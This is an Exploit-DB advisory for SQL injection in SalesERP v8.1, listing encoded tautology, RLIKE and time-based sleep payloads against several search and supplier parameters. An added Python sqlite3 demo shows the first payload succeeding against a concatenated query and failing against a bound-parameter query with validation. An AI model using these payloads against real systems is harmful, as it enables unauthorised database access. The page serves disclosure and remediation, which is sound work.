Sales ERP 8.1 – Multiple SQL Injection

  • Author: Mehmet EMIROGLU
    Date: 2019-05-14
  • Category:
    Platform:
  • Source: https://www.exploit-db.com/exploits/46840/
  • ===========================================================================================
    # Exploit Title: SalesERP v.8.1 SQL Inj.
    # Dork: N/A
    # Date: 13-05-2019
    # Exploit Author: Mehmet EMIROGLU
    # Vendor Homepage: https://codecanyon.net/category/php-scripts?term=sales%20erp
    # Version: v8.1
    # Category: Webapps
    # Tested on: Wamp64, Windows
    # CVE: N/A
    # Software Description: ERP is a modern and responsive small business
    management system.
    It is developed with PHP and the CodeIgniter framework. It is designed and
    developed with shops, small businesses, companies and any type of business
    in mind. It includes accounting, management, invoicing, user and data
    analysis.
    ===========================================================================================
    # POC - SQLi
    # Parameters : customer_id, product_id
    # Attack Pattern : %27/**/oR/**/4803139=4803139/**/aNd/**/%276199%27=%276199
    # POST Method :
    http://localhost/erpbusiness/SalesERPv810/Cproduct/product_by_search?product_id=99999999[SQL Inject Here]
    # POST Method :
    http://localhost/erpbusiness/SalesERPv810/Ccustomer/paid_customer_search_item?customer_id=99999999[SQL Inject Here]
    ===========================================================================================
    # POC - SQLi
    # Parameters : supplier_name
    # Attack Pattern : %27/**/RLIKE/**/(case/**/when/**//**/4190707=4190707/**/then/**/0x454d49524f474c55/**/else/**/0x28/**/end)/**/and/**/'%'='
    # POST Method :
    http://localhost/erpbusiness/SalesERPv810/Csupplier/search_supplier?supplier_name=2900757&supplier_id=[SQL Inject Here]
    ===========================================================================================
    # POC - SQLi
    # Parameters : supplier_name
    # Attack Pattern : 1260781%27 oR if(length(0x454d49524f474c55)>1,sleep(3),0) --%20
    # POST Method :
    http://localhost/erpbusiness/SalesERPv810/Cproduct/add_supplier?add-supplier=Save&address=[TEXT INPUT]4990130&details=[TEXT INPUT]5207543&supplier_name=[SQL Inject Here]
    ===========================================================================================
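
Added example, not part of the original advisory and not SalesERP's code: the first PoC's pattern run against a query built by string concatenation and against the same query with a bound parameter. The application's source is not shown on the page, so the concatenated query, the `product` table and its rows are assumptions, and Python's `sqlite3` stands in for the PHP/MySQL stack.

```python
import re
import sqlite3
from urllib.parse import unquote

# First PoC's attack pattern, copied from the advisory, appended to its id value.
PATTERN = "%27/**/oR/**/4803139=4803139/**/aNd/**/%276199%27=%276199"
PAYLOAD = "99999999" + unquote(PATTERN)

def make_db():
    """Constructed sample data; table and column names are assumptions."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE product (product_id TEXT PRIMARY KEY, name TEXT)")
    db.executemany("INSERT INTO product VALUES (?, ?)",
                   [("1001", "Widget"), ("1002", "Gadget"), ("1003", "Sprocket")])
    return db

def search_concatenated(db, product_id):
    """Assumed vulnerable shape: the request value becomes part of the SQL text."""
    sql = "SELECT name FROM product WHERE product_id = '" + product_id + "'"
    return [row[0] for row in db.execute(sql)]

def search_bound(db, product_id):
    """Hardened shape: the value is bound as data and is never parsed as SQL."""
    sql = "SELECT name FROM product WHERE product_id = ?"
    return [row[0] for row in db.execute(sql, (product_id,))]

def search_validated(db, product_id):
    """Bound parameter plus an allow-list: ids are 1 to 10 ASCII digits."""
    if not re.fullmatch(r"[0-9]{1,10}", product_id):
        raise ValueError("product_id must be numeric")
    return search_bound(db, product_id)

if __name__ == "__main__":
    db = make_db()
    print("concatenated:", search_concatenated(db, PAYLOAD))  # every row matches
    print("bound:       ", search_bound(db, PAYLOAD))         # no row matches
    try:
        search_validated(db, PAYLOAD)
    except ValueError as exc:
        print("validated:   ", exc)
```

In CodeIgniter the counterpart of `search_bound` is a query binding, `$this->db->query($sql, array($id))`, or the query builder's `where()`, both of which escape the value instead of splicing it into the statement.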